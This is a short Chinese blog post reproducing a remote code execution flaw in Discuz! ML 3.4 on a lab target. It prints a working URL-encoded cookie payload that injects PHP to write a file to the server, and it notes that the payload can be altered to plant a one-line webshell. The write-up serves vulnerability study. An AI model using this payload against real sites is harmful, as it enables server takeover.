关于前天出的discuz!ML3.4最新版的rce getshell漏洞复现

首先搭建环境,下载discuz!ML3.4 最新版本

https://bitbucket.org/vot/discuz.ml/get/tip.zip

一步一步安装在靶机上,很简单的,,,,,

直接刷新,使用burp抓包

修改*****_language这个cookies参数,可以实现任意文件上传

poc:%27%2e%20%66%69%6c%65%5f%70%75%74%5f%63%6f%6e%74%65%6e%74%73%28%27%68%79%63%63%2e%70%68%70%27%2c%75%72%6c%64%65%63%6f%64%65%28%27%25%33%63%25%33%66%70%68%70%20%25%32%30%25%37%30%25%36%38%25%37%30%25%36%39%25%36%45%25%36%36%25%36%46%25%32%38%25%32%39%25%33%42%25%33%66%25%33%65%27%29%29%2e%27

发包后

可修改poc实现一句话木马上传,成功getshell

参考于圈子社区晏子霜的文章

点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注

Loading...